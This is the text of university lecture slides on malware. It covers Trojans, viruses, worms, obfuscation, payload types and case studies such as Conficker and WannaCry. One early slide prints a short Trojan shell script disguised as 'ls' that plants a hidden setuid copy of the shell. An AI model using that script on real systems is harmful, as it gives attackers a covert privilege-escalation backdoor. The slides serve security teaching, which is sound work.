IT-Security 2

Chapter 2: Malware – Trojans, Viruses,

Worms, and Payloads
Prof. Dr.-Ing. Ulrike Meyer
 Overview on the Malware Chapters

§ Chapter 2: Malware – Trojans, Viruses, Worms, and Payloads

§ Motivation of malware writers
§ Classical malware classification with respect to spreading
§ Virus, Trojan Horse, Worms
§ Malware classification by payload (malicious action)

§ Chapter 3: Malware – Botnets

§ Command-and-Control protocols
§ Underground Economy
§ Examples, Including advanced persistent threats like the Stuxnet worm
§ Detection and take down

§ Chapter 4: Malware – Countermeasures

§ Chapter 5: Malware – Mobile Malware
§ The specifics of malware targeting (mainly) Android devices

IT-Security 2 -- Chapter 2 Malware 2

 Malware = Malicious Software

§ Accoring to NIST SP 800-83, 2013, malware is

“A program that is inserted into a system, usually covertly, with the intent
of compromising the confidentiality, integrity or availability of the
victim’s data, applications, or operating system or otherwise annoying or
disrupting the victim”

§ Note that
§ Definition excludes coincidences, although their consequences may
be similar
§ Owner of the system and the victim do not have to coincide

IT-Security 2 -- Chapter 2 Malware 3

 Malware = Malicious Software

§ Malicious code often masquerades as good software

§ Some malicious programs need host programs

§ Trojan horses, logic bombs, viruses

§ Others can exist and propagate on their own

§ Worms

§ Many infection vectors and propagation methods

§ Modern malware often combines several types of malware

§ E.g. a malware may combine trojan, rootkit, and worm functionality

IT-Security 2 -- Chapter 2 Malware 4

Motivation to Write Malware (1)

§ Experiment how to write viruses

§ Test own programming talent

§ Gets famous around the World

§ Get a buzz, acknowledged or otherwise,

from vandalism

§ Some consider they are fighting

authority

IT-Security 2 -- Chapter 2 Malware 5

Motivation to Write Malware (2)

§ Some like 'matching wits' with anti virus vendors

§ Pentesting – hacking by order of the target

§ Goal: identify vulnerabilities and close them before
anyone can exploit them maliciously

§ Combating crime and terrorism

§ Very controversial use of ”malware”
§ E.g. use a trojan to spy on suspect’s online activities
§ Or use a ”cleaning worm” that disinfects machines
infected with a specific malware

IT-Security 2 -- Chapter 2 Malware 6

Motivation to Write Malware (3)

§ Direct financial gain and organized crime

§ Botnets- e.g. Spam distribution, DDoS attacks
§ Ransomware- Encrypt victim’s data, blackmail
§ Selling attack kits, payloads, exploits etc.
§ Stealing and selling information
§ E.g. access credentials for ebay, facebook accounts,
credit card numbers,…

§ Corporate espionage
§ Stealing patented information, prizing strategies,
information on new models,…
§ Indirect financial gain

IT-Security 2 -- Chapter 2 Malware 7

 Simple Example for Malicious Code

§ Attacker writes a small shell script on a UNIX system:

cp /bin/sh /tmp/.xyz
chmod u+s,o+x /tmp/.xyz
rm ./ls
ls $*

§ Attacker saves this script in a file called “ls” and tricks a victim user into
executing it

§ To the victim user, the result will look as if the real ls command would
have been executed

§ This leads to a copy of the shell in a hidden file executable by anyone with
the userid set to who-ever-executed-the-script

IT-Security 2 -- Chapter 2 Malware 8

 Trojan Horse

§ Program with an
§ overt purpose (known to user) and a
§ covert purpose (unknown to user)
§ Often called a Trojan

§ Example script on previous slide is a Trojan horse

§ Overt purpose: list files in directory
§ Covert purpose: create setuid shell

§ In the classical sense, Trojans do not replicate themselves

§ Modern Trojans often come with worm-like functionality

IT-Security 2 -- Chapter 2 Malware 9

Examples for Covert Purposes (not restricted to Trojans)

§ Back doors
§ Methods of bypassing normal authentication
§ Gain remote access to a computer
§ While attempting to remain undetected

§ Keystroke loggers – steal passwords

§ Web clickers – run up advertising costs

§ Proxies – allows others to use your machine to

launder connections
§ Spam engines

§ DDoS engines

§…

IT-Security 2 -- Chapter 2 Malware 10

 Spreading of Trojans

§ Many Trojans are inadvertently installed by the user, e.g.

§ Trojan horses in purported hacking tools and free AV tools, other types of
security software
§ Source Repositories that plant Trojan in popular packages
§ Third-party widgets that make sites “prettier” (e.g. calendars, visitor counters,
etc.)
§ Example: free widget for keeping visitor statistics operates fine from 2002 until
2006
§ In 2006, widget starts pushing exploits on all visitors of pages linked to the counter
§ Website with thumbnails of adult videos
§ Clicking on a thumbnail brings up a page that looks like Windows Media Player and a prompt:
§ “Windows Media Player cannot play video file. Click here to download missing Video ActiveX
object.”
§ The “codec” is actually a malware binary

IT-Security 2 -- Chapter 2 Malware 11

 End-User License Agreement Attacks

§ If you agree to a Trojan being installed does that make it legal?

§ Is it legal if the license agreement is deliberately confusing?

§ How carefully do you read license agreements, anyway?

IT-Security 2 -- Chapter 2 Malware 12

 How do we Avoid Installing Trojans

§ Seemingly obvious solution

§ Install only trusted operating systems, applications, and tools

§ But: how do we decide whether or not to trust an executable?

§ Often claimed safe approach

§ Use open source code
§ Compile source code yourself

§ But:
§ Do you really check the source code?
§ And what about the compiler?

IT-Security 2 -- Chapter 2 Malware 13

 Ken Thompson's C Compiler Hack 1984

§ Published in 1984: “On trusting trust”

§ Describes how to
§ Write a self-reproducing code fragment
§ In a first step, modify the compiler such that
§ when it compiles the login program, it inserts a back door
§ login with back door accepts the user's correct password or a fixed master
password (the same one for all users)
§ Now make the original login code open source such that anyone can check it
for backdoors

IT-Security 2 -- Chapter 2 Malware 14

 The Login Program

user password

login source correct compiler login executable

logged in

user password or
magic password

login source modified compiler login executable

logged in

IT-Security 2 -- Chapter 2 Malware 15

 What About the Compiler Source?

§ Modify the compiler again such that

§ when it compiles a new version of the compiler, the extra code to do the first
step is automatically inserted

§ Recompile the compiler

§ Backdoor persists in the executable

§ Delete the source containing the modification and put the original
compiler source back in place

§ So, what we can now published is

§ The original compiler source
§ The compiler executable that contains the modification
§ The original login source

IT-Security 2 -- Chapter 2 Malware 16

 The Compiler

login source

compiler source correct compiler compiler executable

correct login executable

login source

compiler source modified compiler compiler executable

rigged login executable

IT-Security 2 -- Chapter 2 Malware 17

 The Point of Thomson’s Hack

§ Proven by Thomson’s Hack:

§ Even if your system uses verifiable software on operating system, application
and tools level, your compiler may still contain a Trojan
§ Open source does not entirely solve the problem

§ Thompson during his speech when receiving the Turing award in 1983
§ “The moral is obvious. You can't trust code that you did not totally create
yourself. (Especially code from companies that employ people like me.) No
amount of source-level verification or scrutiny will protect you from using
untrusted code.“

IT-Security 2 -- Chapter 2 Malware 18

 Example: Zlob Trojan

§ Also known as Trojan.Zlob, first detected in late 2005

§ Masquerades as required video codec

§ along with online games
§ but mostly over instant messaging

§ Once installed it displays popup ads

§ Ads inform users that their computer is infected with spyware and advertises a
fake anti-spyware program
§ Clicking on popup triggers download of fake anti-spyware program in which
another Trojan is hidden
§ This one causes random computer shutdowns or reboots
§ Payload of some versions also modified DNS settings

IT-Security 2 -- Chapter 2 Malware 19

 More Recent Example for a Trojan: CryptoLocker

§ Ransomware that occurred in 2013-2014

§ Trojan that targeted Windows Machines

§ Propagated via infected email attachments containing zip file with executable disguised
as pdf-file
§ When run, encrypts certain types of files stored locally and on mounted network drives
§ Uses RSA public-key for encryption, private key stored on the control server for the
malware
§ Displays a message which offers to decrypt the data if a payment through either bitcoin
or a pre-paid cash voucher is made

§ Reported total amount of ransom gained by attack varies

§ Reports rage between 3-27 million $ partly due to variance in bitcoin value, partly due to
differences in the estimates for the unreported cases

§ Recovering encrypted data impossible until the private-key database was

discovered

IT-Security 2 -- Chapter 2 Malware 20

 Computer Virus

Software fragment that attaches itself to some existing executable. Virus can
replicate itself and pass on malicious code to other non-malicious executables
by modifying them
§ Analogy to a biological virus
§ Infects healthy subjects by attaching itself to the program
§ Either destroys or coexists with with the program after infection

§ A computer virus can be transient or resident

§ The life span of a transient virus depends on its host program
§ Virus runs as long as the program to which it is attached executes
§ Terminates when host program ends
§ Spreads while it is running
§ A resident virus locates itself in memory
§ Can remain active or be activated as a stand-alone program even after its host
program ends

§ Someone has to run the infected program to initially execute the virus

IT-Security 2 -- Chapter 2 Malware 21

 The Nature of Viruses

§ Pieces of software that

§ Can infect an executable file by modifying it
§ Virus thus embedded in the executable of a program or any other carrier of
executable content

§ Modification includes
§ Injecting a routine to make copies of the virus code

§ Whenever the infected executable comes into contact with an uninfected

piece of code a fresh copy of the virus is passed on

§ Whenever users exchange infected programs or files the virus spreads to

other machines
§ E.g. via disks, USB sticks, file sharing applications, email attachments, instant
messengers, social networks,…

IT-Security 2 -- Chapter 2 Malware 22

 Is a Virus a Trojan Horse or Not?

§ Some say Yes

§ Overt action = infected program’s actions
§ Covert action = virus’ actions (infect, execute)

§ Other say No
§ Overt purpose = virus’ actions (infect, execute)
§ Covert purpose = none

§ Semantic, philosophical differences

§ Defenses against Trojan horse also inhibit computer viruses

IT-Security 2 -- Chapter 2 Malware 23

 Viruses History (1)

§ Programmers for Apple II wrote some

§ Not called viruses; very experimental
§ E.g. Elk Cloner, written by Richard Skrenta in 1982
§ Resulted in first large scale computer virus outbreak
§ Boot sector virus that spread over infected floppy disks
§ Infected computers would display a short poem every 50th boot
§ When a computer was booted from an infected disk a copy of the virus
was placed in the computer’s memory
§ Any uninfected disk would then also be infected with the virus

Elk Cloner: The program with a personality

It will get on all your disks
It will infiltrate your chips
Yes, it's Cloner!
It will stick to you like glue
It will modify RAM too
Send in the Cloner!

IT-Security 2 -- Chapter 2 Malware 24

 Viruses History (1)

§ Fred Cohen 1983

§ Graduate student who described a self-replicating computer program
§ Teacher (Adleman) named it “computer virus”
§ Tested idea on UNIX systems and UNIVAC 1108 system

IT-Security 2 -- Chapter 2 Malware 25

 Parts of a Virus

§ Infection mechanism (infection vector) – The means by which

a virus spreads or propagates, enabling it to replicate.

§ Trigger – The event or condition that determines when the

payload is activated or delivered.

§ Payload – What the virus does, besides spreading. The payload

may involve damage or may involve benign but noticeable
activity.

IT-Security 2 -- Chapter 2 Malware 26

 Typical Phases in the Lifetime of a Virus

§ Dormant phase – The virus is idle and waiting to be activated

§ Propagation phase – The virus places a copy of itself (or a

mutation of it) into other programs or into certain system
areas on a disk

§ Triggering (activating) phase – The virus is activated to perform

the functionality for which it was created. Can be caused by
e.g. number of copies made of this copy, date and time,...

§ Execution phase – The malicious function (payload) is

performed (executed). E.g. message displayed on screen,
destruction of programs or data files

IT-Security 2 -- Chapter 2 Malware 27

 Computer Virus – Classification by Target

§ Boot sector infector

§ Infects a boot record and spreads when a system is booted from the disk
containing the virus

§ File infector / Executable infector

§ Infects files that the operating system or shell consider as executable

§ Macro virus
§ Infects files with macro or scripting code that is interpreted by an application

§ Multipartite virus
§ Infects files in multiples ways. Typically, the multipartite virus is capable of
infecting multiple types of files, so that virus eradication must deal with all of
the possible sites of infection

IT-Security 2 -- Chapter 2 Malware 28

 Executable Infectors

Header Executable code

0 100 1000
First program instruction to be executed

Header Virus Code Executable code

0 100 200 1100

§A virus that infects executable programs

§ Part of an ordinary executable
§ E.g., adds itself to one end, saves the old code, inserts a branch to it
§ Easy to detect as length of the original executable increases
§ Consequence: more sophisticated viruses hide increase e.g. by
§ Overwriting (an unused) part of the original code
§ Compressing the original executable

IT-Security 2 -- Chapter 2 Malware 29

 Early Example for an Executable Infector

§ Jerusalem (Israeli) virus first spotted in 1987 in Jerusalem

§ DOS file virus that infects every executable except for COMMAND.COM
§ Checks if system infected
§ If not, set up to respond to requests to execute files
§ Checks date
§ If not 1987 or Friday 13th, infect all programs run
§ Otherwise, set destructive flag; will delete, not infect, files
§ Then: check all calls asking for files to be executed
§ Do nothing for COMMAND.COM
§ Otherwise, infect or delete

§ Programming error in the virus:

§ .EXE files continuously re-infected and grow on each reinfection until they are
too large to load into memory

IT-Security 2 -- Chapter 2 Malware 30

 Macro Viruses

§ A macro..
§ is an executable program written in a scripting language embedded in a file
generated with an application
§ E.g. embedded in a word processing document or spreadsheet

§ A macro virus…
§ is composed of a sequence of instructions that are interpreted by an
application (e.g. Word, Excel) rather than executed directly
§ are platform independent
§ spread easily as documents are more often exchanged than programs

§ When an infected document is opened, the virus copies itself into the
global macro file and makes itself auto-executing
§ Invoked whenever any document is opened or created

§ Decreased in popularity as detection and warning tools directly embedded

in applications like Word, …

IT-Security 2 -- Chapter 2 Malware 31

 Computer Viruses – Classification by Concealment Strategy

§ Encrypted virus
§ Stealth virus -> uses rootkit techniques

§ Polymorphic virus
§ Metamorphic virus

IT-Security 2 -- Chapter 2 Malware 32

 Encrypted Viruses

§ A virus that is enciphered except for a small decryption routine

§ Detecting virus by signature now much harder as most of virus is encrypted

Virus code Decryption routine Encrypted virus code

Decryption key

IT-Security 2 -- Chapter 2 Malware 33

 Polymorphic Viruses

§ A virus that changes its form each time it inserts itself into another
program
§ While functionality stays the same
§ Idea is to prevent signature detection by changing the “signature” or
instructions used for decryption routine
§ Simplest form: encrypt the same virus body with a different key on each
infection

§ More advanced
§ At instruction level: substitute instructions
§ At algorithm level: different algorithms to achieve the same purpose
§ Possible also on the decryption routine

§ Toolkits supporting virus writers

§ E.g. Mutation Engine MtE, Trident Polymorphic Engine

IT-Security 2 -- Chapter 2 Malware 34

 Anti-Virus Technologies

§ Simple anti-virus scanners

§ Look for signatures (fragments of known virus code)
§ Heuristics for recognizing code associated with viruses
§ Polymorphic viruses often use decryption loops
§ Integrity checking to find modified files
§ Record file sizes, checksums, MACs (keyed hashes of contents)

§ Generic decryption and emulation

§ Emulate CPU execution for a few hundred instructions, recognize known body
after virus decrypts
§ Does not work very well against mutating viruses and viruses not located near
beginning of infected executable
§ Virus decryptor can start with millions of NOPs

IT-Security 2 -- Chapter 2 Malware 35

 Detecting an Encrypted Virus by Emulation

Randomly generates a new key Decrypt and execute

and corresponding decryptor code

Mutation A

Virus body

Mutation B

Mutation C

To detect an unknown mutation of a known virus ,

emulate CPU execution of until the current sequence of
instruction opcodes matches the known sequence for virus body

IT-Security 2 -- Chapter 2 Malware 36

 Metamorphic Viruses

§ Obvious next step: mutate the virus body, too!

§ Virus can carry its source code (which deliberately contains some useless
junk) and recompile itself
§ Apparition virus (Win32)
§ Virus first looks for an installed compiler
§ Virus changes junk in its source and recompiles itself
§ New binary mutation looks completely different!

§ Mutation is common in macro and script viruses

§ Macros/scripts are usually interpreted, not compiled

IT-Security 2 -- Chapter 2 Malware 37

 Obfuscation and Anti-Debugging

§ Common in worms, viruses, bots

§ Goal: prevent analysis of code and signature-based detection, foil reverse-
engineering
§ Insert garbage opcodes and change control structure
§ Different code in each instance
§ Effect of code execution is the same, but difficult to detect by passive analysis
§ Packed binaries

§ Detect debuggers and virtual machines, terminate execution

IT-Security 2 -- Chapter 2 Malware 38

 Examples for Mutation / Obfuscation Techniques

§ Same code, different register names

§ Regswap (Win32)

§ Same code, different subroutine order

§ BadBoy (DOS), Ghost (Win32)
§ If n subroutines, then n! possible mutations

§ Decrypt virus body instruction by instruction, push instructions on stack,

insert and remove jumps, rebuild body on stack
§ Zmorph (Win95)
§ Can be detected by emulation because the rebuilt body has a constant
instruction sequence
§…

IT-Security 2 -- Chapter 2 Malware 39

 Mutation Engines

§ Real Permutating Engine/RPME, ADMutate, etc.

§ Large set of obfuscating techniques
§ Instructions are reordered, branch conditions reversed
§ Jumps and NOPs inserted in random places
§ Garbage opcodes inserted in unreachable code areas
§ Instruction sequences replaced with other instructions that have the same
effect, but different opcodes
§ Mutate SUB EAX, EAX into XOR EAX, EAX or
PUSH EBP; MOV EBP, ESP into PUSH EBP; PUSH ESP; POP EBP

§ There is no constant, recognizable virus body!

IT-Security 2 -- Chapter 2 Malware 40

 Example of Zperm Mutation

§ From Szor and Ferrie, “Hunting for Metamorphic”, Symantec White Paper,
2001

IT-Security 2 -- Chapter 2 Malware 41

 Putting It All Together: Zmist

§ Zmist was designed in 2001 by Russian virus writer Z0mbie

§ Technique: code integration
§ Virus merges itself into the instruction flow of its host
§ “Islands” of code are integrated
into random locations in the host
program and linked by jumps
§ When/if virus code is run, it infects
every available portable executable
§ Randomly inserted virus entry point
may not be reached in a particular execution

IT-Security 2 -- Chapter 2 Malware 42

 MISTFALL Disassembly Engine

§ To integrate itself into host’s instruction flow, virus must disassemble and
rebuild host binary

§ This is very tricky

§ Addresses are based on offsets, which must be recomputed when new
instructions are inserted
§ Iterative process: rebuild with new addresses, see if branch destinations
changed, then rebuild again
§ Requires 32MB of RAM and explicit section names (DATA, CODE, etc.) in the host
binary – doesn’t work with every file

IT-Security 2 -- Chapter 2 Malware 43

 Simplified Zmist Infection Process

Randomly insert
indirect call OR jump
to decryptor’s entry
point OR rely on
instruction flow to
reach it

Pick a Portable Decryptor must

Executable binary restore host’s
< 448Kb in size registers to
preserve host’s
functionality

Disassemble, insert space for new Insert mutated virus body Encrypt virus body by Insert random garbage
code blocks, generate new binary • Split into jump-linked “islands” XOR (ADD, SUB) with a instructions using
• Mutate opcodes (XOR ↔ SUB, OR ↔ TEST) randomly generated key, Executable Trash Generator
• Swap register moves and PUSH/POP, etc.
insert mutated decryptor

IT-Security 2 -- Chapter 2 Malware 44

 Computer Worms

§ Worms propagate by exploiting software vulnerabilities

§ A worm is a program that actively seeks machines to infect

§ Each infected machine serves as an automated launching pad for

attacks on other machines

§ Gains access to each new machine by exploiting software

vulnerabilities in client or server programs

§ Worms spread from system to system via

§ Network connections
§ Shared media (USB drives, CDs, DVDs etc.)
§…

IT-Security 2 -- Chapter 2 Malware 45

 Typical Means of Replication

§ Email or instant messengers

§ Worm e-mails a copy of itself to other systems or
§ sends itself as an attachment via an instant message service
§ Code is executed when email viewed or attachment opened

§ File sharing
§ Worm creates a copy of itself on e.g. a USB drive, executes when drive is
connected to another system using the autorun mechanism

§ Remote execution capability

§ Worm executes a copy of itself on another system by using remote execution
facility or by exploiting a program flaw in a network service

§ Remote file access or transfer capability

§ Used by worms to copy itself from one system to another

IT-Security 2 -- Chapter 2 Malware 46

 Phases in the Lifetime of a Worm

§ Same as for viruses: dormant, propagation, triggering, execution

§ Typical functions of the propagation phase
§ Search for appropriate access mechanisms to other systems to infect
§ Examine host tables, address books, buddy lists, trusted peers, …
§ Scan possible target host addresses
§ Search for removable media devices
§ Use the access mechanism found to transfer a copy of itself to the remote
system and cause the copy to be run
§ May also check if system has previously been infected

IT-Security 2 -- Chapter 2 Malware 47

 Target Discovery

§ Scanning
§ If worm spreads via software vulnerability in remotely accessible network
service
§ It must identify target systems running the vulnerable service

§ Address scanning strategies

§ Random
§ Infected host probes random addresses in the IP address space
§ Easy to detect due to high volume of traffic generated
§ Hit-list
§ First compile list of candidate targets (slowly such that no suspicion raised)
§ Start trying to infect candidate targets (fast)
§ Provide each successfully infected machine with part of the list
§ Topological
§ Use information on other hosts present in infected machine
§ Local subnet
§ Host behind a firewall tries to infect hosts on same subnet

IT-Security 2 -- Chapter 2 Malware 48

 First Worms

§ Concept introduced in Johan Brunner’s 1975 Science Fiction novel “The

shockwave Rider”

§ First implementation: experiment in distributed computing

§ John Shoch and Jon Hupp, Xerox PARC, 1978 (published 1982):
§ Wrote a program they called a worm
§ Replicated itself across the network
§ Created for non-malicious purposes
§ Worm looks for idle processors and assigned tasks to them
§ Any activity on an “infected” workstation caused the worm to shut down

IT-Security 2 -- Chapter 2 Malware 49

Example: Merry Christmas Worm 1987

IT-Security 2 -- Chapter 2 Malware 50

 Example: Merry Christmas Worm 1987

§ Designed for IBM mainframes

§ Written in the mainframe command language REXX
§ Started with a header saying “Don’t read me, EXEC me’
§ When run
§ Drew Christmas tree (see last slide)
§ Also checked address book: list of previously received email and sent copies to
each address
§ Originally written as a prank rather than out of malice
§ Shut down several IBM networks
§ Really a macro worm
§ Written in a command language that was interpreted

IT-Security 2 -- Chapter 2 Malware 51

 First Famous Worm: Internet Worm 1988

§ Program written by Robert Morris Jr (hence “Morris’ Worm)

§ Exploits several vulnerabilities to spread from one machine to another via

the Internet
§ Using password guessing with a dictionary of 432 common passwords
§ Making use of .rhost files on infected machines
§ .rhost file contains a list of host-user combinations letting users with permission to
log in remotely from the specified host without having to supply a password.
§ Problems with sendmail
§ Eric Allman, author of sendmail, wanted continued development access on a
production system
§ The system manager wouldn’t let him
§ He installed a password-protected back door in the next release
§ Due to a bug, this back door was generally unprotected

§ Worm tried to camouflage itself

§ Its name was sh and used a simple Caesar cipher to mutate

§ Originally designed to measure the size of the Internet

IT-Security 2 -- Chapter 2 Malware 52

 Blaster Worm of 2003

§ Also nown as Lovsan or Lovesan

§ Contained two messages
§ “I just want to say Love you San!!”
§ “Billy Gates why do you make this possible? Stop making money and fix your
software!!”
§ Spread on Windows XP and Windows 2000 computers
§ First noticed in August 2003
§ Spread by exploiting a buffer overflow in the DCOM remote procedure call
service MS03-026, 039
§ Patch of the overflow was released in Juli 2003
§ Worm was programmed to start a SYN flood against port 80 of
windowsupdate.com to create a distributed denial of service attack
§ Effect was limited as Microsoft temporarily shut down the target

IT-Security 2 -- Chapter 2 Malware 53

 Conficker 2008

§ Discovered in Nov 2008, infected several million computers

§ Also known as “Downup”, “Downadup” and “Kido”

§ Targeted various Windows operating systems

§ Windows 2000, XP, Vista, Server 2003, Server 2008,…

§ Exploited the MS08-067 vulnerability in the server service

§ Allowed for remote code execution

§ Patch released in October (!) 2008 already

§ an estimated 30% of Windows PCs remained unpatched in January
2009 still
§ In April 2010 still over six million victim machines were infected

IT-Security 2 -- Chapter 2 Malware 54

 Propagation

§ Conficker came in five versions: A, B, C, D, E

§ Variants closed holes previously found in the worm by researchers, A/V
vendors, and law enforcement
§ Update themselves to the next variant

§ Variants A, B, and E: MS08-067 Server Service Vulnerability

§ Server service vulnerability allows remote attackers to execute
arbitrary code
§ An already infected source computer
§ uses specially formatted RPC (remote procedure call) request to force a
stack buffer overflow
§ executes shellcode on the target computer

IT-Security 2 -- Chapter 2 Malware 55

 Updating by Vulnerability

§ Variant A patches MS08-067 but does not allow for re-

infection, update only via download
§ Variants B, C, and E can additionally
§ perform in-memory patches to NetBIOS-related DLLs to close MS08-
067 AND watch for re-infection attempts
§ Re-infection from more recent versions of Conficker are allowed
through

IT-Security 2 -- Chapter 2 Malware 56

 Initial Infection (1)

§ Variant A, B, and E
§ Worm runs an HTTP server on source computer
§ Target shellcode connects back to HTTP server to download a copy of
the worm as Dynamically Linked Library
§ Loads the copy to processes such as svchost.exe (Variant A) or running
services.exe or Windows Explorer processes (Variant B and higher)
invoking LoadLibrary with the DLL as argument
§ DLL copies itself in the system root directory under a random file name
§ After initiating Winsock DLL the malware is executed

IT-Security 2 -- Chapter 2 Malware 57

 Initial Infection (1)

§ Variant B and C can additionally

§ remotely execute copies of themselves on computers visible over
NetBIOS through the administrative share
§ If the share is password protected, a dictionary attack is used
§ also place a copy of their DLL form to any attached removable media
(e.g. USB flash drives)
§ can infect new hosts through Windows AutoRun mechanism

IT-Security 2 -- Chapter 2 Malware 58

 Payload Propagation and Updating

§ Pushing/pulling executables supported

§ Payloads are used by the worm
§ to update itself to newer variants
§ to install additional malware
§ Variant A pulling executables from remote HTTP servers
§ Generates list of 250 domain names per day across five top level domains
§ Domain names are generated using a domain generating algorithm (DGA)
§ pseudo-random number generator seeded with current UCT system date
§ Worm attempts to resolve the domain names
§ If resolution succeeds it establishes an HTTP connection to each domain name
in turn
§ Accepts correctly signed (!) payload from any of them
§ Variant B
§ Increases number of top-level domains to eight and produces domain names
disjoint from those of A every hour and seeds them differently

IT-Security 2 -- Chapter 2 Malware 59

 Detecting Conficker Variants A and B

§ Infections can be detected by reconstructing the domain

names generated by the different variants
§ Monitor if DNS traffic to resolve these domains occur
§ Identify source of traffic as infected device

§ Register one of the domains in order to see which hosts

connect to the domain and thus identify infected hosts

§ Pre-registering all 500 domains that are used by Conficker A

and B would in theory prevent future updates of the worm
§ Domains blocked until 2010
§ Unfortunately not sufficient: Variant C came up

IT-Security 2 -- Chapter 2 Malware 60

 Payload Propagation and Updates (2)

§ Variant C
§ Generates a pool of 50 000 domains daily across 110 top-level domains
§ Randomly selects 500 to connect to
§ Using Windows’ random number generator seeded with unpredictable host
dependent seed
§ Consequence
§ No reliable prediction of domains that are going to be contacted possible any more
§ Expected rate of successful updates: only 1% of infected hosts per day
§ The shorter domain names are expected to collide with 150-200 existing
domains per day -> potential for DDoS attacks

§ Variants D and E create an ad-hoc peer-to-peer network to push and pull

payloads over the Internet
§ Heavily obfuscated part of the code

IT-Security 2 -- Chapter 2 Malware 61

 Payload Checking

§ Prevention of payload hijacking

§ Variant A payloads are hashed with SHA-1, encrypted with RC4 using the 128-
bit (Variant A) or 512-bit (Variant B and higher) hash as key, hash is signed with
1024-bit or 4096-bit private RSA key, signature appended to binary
§ Payload only unpacked and executed if signature verifies with public key
embedded in the worm

§ Conficker Version A, B, C, and D never downloaded any malicous payload

but the updates

§ Conficker E downloaded the spambot Waldec and a Scareware

§ Conficker ist still active in 2019 although it is detected by all common A/V
products

IT-Security 2 -- Chapter 2 Malware 62

 WannaCry2.0 Ransomware Worm

§ Major outbreak between May and June 2017

§ Exploited vulnerabilities in several Windows versions

§ For which a patch had been released by Microsoft in March 2017!
§ Implemented in Exploit tools kit EternalBlue

§ Spread over more than 150 countries world wide infecting over 200 000
machines
§ Spreading stopped after kill switch domain detected and registered by malware analysts

§ Encrypts files on infected machines with RSA with 2048 bit keys
§ Generate an AES key for encrypting the files, encrypt the AES key with public RSA key

§ Ransom of the bit-coin equivalent of initially 300$ demanded

§ Doubled after 3 days, files deleted if ransom not paid after 7 days

IT-Security 2 -- Chapter 2 Malware 63

WannaCry Pop-Up Window

IT-Security 2 -- Chapter 2 Malware 64

Language Options WannaCry Supports

IT-Security 2 -- Chapter 2 Malware 65

Example for Infection: DB Display Boards

IT-Security 2 -- Chapter 2 Malware 66

 WannaCry Decryption Tools

§ Released on May 18th 2017 by Quarkslab

§ Malware analyists there found out that WannaCry
§ Generates the RSA public/private key pair used to encrypt/decrypt the
files on the infected machine
§ Erases the private key from the system after sending it to a command
and control server
§ But: does not delete the prime numbers used to generate the keys
from memory
§ These can be recovered if the machine has not been rebooted and
they have not been overwritten by any other processes yet
§ Knowing the prime numbers, the private key can easily be computed
from the public key

IT-Security 2 -- Chapter 2 Malware 67

 Classification of Payload Types (for Trojans, Viruses, Worms)

§ Non-destructive – e.g. displaying funny messages, flashing an

image on the screen, sending a virus hoax, i.e. a message
warning of a new virus making the victim forward the message
to others,…

§ Destructive – corrupt files, delete files, damage software,...

with no reason other then to harm the victim

§ Commercial or criminal intent - stealing information such as

credentials, corporate plans, personal data, gain remote
control of the victim’s machine to distribute spam or conduct
distributed denial of service attacks

IT-Security 2 -- Chapter 2 Malware 68

 Direct and Indirect Harm to Users

§ Direct harm to users

§ Hiding the cursor
§ Displaying text or image on the screen
§ Opening a browser window to a website related to the current activity
§ Sending email to some or all entries of the victim's contacts
§ Opening text documents and, e.g. changing ”is” to “is not”
§ Deleting all files
§ Modifying system program files (e.g. to avoid detection)
§ Stealing and forwarding sensitive information
§ Indirect harm to users
§ Cost of cleaning up the machines
§ Cost of reputation for companies and organizations
§ Losing customers due to unavailability of services

IT-Security 2 -- Chapter 2 Malware 69

 Harm to Victim’s Systems

§ Malware typically try to conceal their infections

§ For example malware may
§ Hide a file in a lower level directory (e.g. a subdirectory of some
legitimate popular program)
§ Attach to a critical system file that is invoked during system startup
§ Replace a non-critical system file
§ Hide copies of the executable in more than one location
§ Modify system registry so that the malware is always executed or
malware detection is disabled

IT-Security 2 -- Chapter 2 Malware 70

 Harm to (rest of) the World

§ Malware depletes network resources

§ Email traffic
§ Scanning for other hosts on the network with specific vulnerability
§ Command and control traffic for botnets
§ Spam distribution
§ Distributed Denial of Service (DDoS) attacks
§ ...
§ Cleaning up large infections is time and cost intensive
§ Owners of infected machines are not necessariliy harmed
§ But their machines may be used to harm others
§ E.g. bots used for distributed denial of service attack (see next chapter)

IT-Security 2 -- Chapter 2 Malware 71

 Malware Classification by Payload

§ System Corruption
§ Data Destruction
§ Ransomware
§ Physical-World Damage
§ Logic Bomb
§ Information Theft
§ Keyloggers and spyware
§ Phishing and identity theft
§ Espionage and data exfiltration
§ Stealthing
§ Backdoors and rootkits
§ Bots -> next chapter

IT-Security 2 -- Chapter 2 Malware 72

 System Corruption Payload

§ Data Destruction – deleting data, corrupting file system,…

§ Ransomware – encrypt user data, demand payment for

decrypting it, typically use public key cryptography today

§ Physical-World Damage – e.g. rewrite the BIOS code such that

boot fails, Stuxnet aiming at centrifuges in power plants,…

§ Logic Bomb – key component of many corruption payloads,

contains code that checks the condition that triggers the
malicious functionality

IT-Security 2 -- Chapter 2 Malware 73

 Information Theft

§ Keyloggers and spyware

§ Capture key strokes, take screen captures, activate microphone or
cameras,…

§ Phishing and identity theft

§ URL included in spam email or fake instant message that links to fake
webpage, fake webpage logs username/password, redirects to real
website

§ Reconnaissance, Espionage and data exfiltration

§ Steal specific confidential information from an infected system

IT-Security 2 -- Chapter 2 Malware 74

 Stealthing – Backdoors and Rootkits

§ Backdoors – secret entry point to a program that allows

anyone aware of the backdoor to gain access

§ Rootkits – set of programs installed on a system to

§ maintain covert access to that system with root privileges
§ while hiding evidence of its presence as much as possible
§ Typically alters a victim’s standard functionality in a malicious and
stealthy way

IT-Security 2 -- Chapter 2 Malware 75

 Rootkits

§ Rootkit
§ Main characteristic: stealthiness
§ hides infection from the host’s owner
§ Typical infection path:
§ Use stolen password or dictionary attack to log in
§ Use a buffer overflow in a vulnerable local program to gain root
privileges
§ Download rootkit, unpack, compile, install
§ Rootkits often modify parts of the operating system
§ Install themselves as drivers or kernel modules
§ May also install a “back door” such as replacing the login
mechanism

IT-Security 2 -- Chapter 2 Malware 76

 Classification of Rootkits

§ Persistent – activates each time the system boots

§ Rootkit must store code in persistent store, e.g. registry or file system
§ Find a way such that code executes without user intervention
§ Memory based
§ No persistent code and thus cannot survive a reboot
§ Harder to detect as it only exists in memory
§ User mode
§ Intercepts calls to APIs and modifies returned results
§ E.g. app performs directory listing, return results do not include entries of files
associated with the rootkit
§ Kernel mode
§ Intercepts calls to native APIs in kernel mode
§ Can e.g. hide its presence from the kernel’s list of active processes
§ Virtual machine based
§ Installs a virtual machine monitor, runs OS in virtual machine
§ Can intercept and modify states and events occurring in the virtualized system

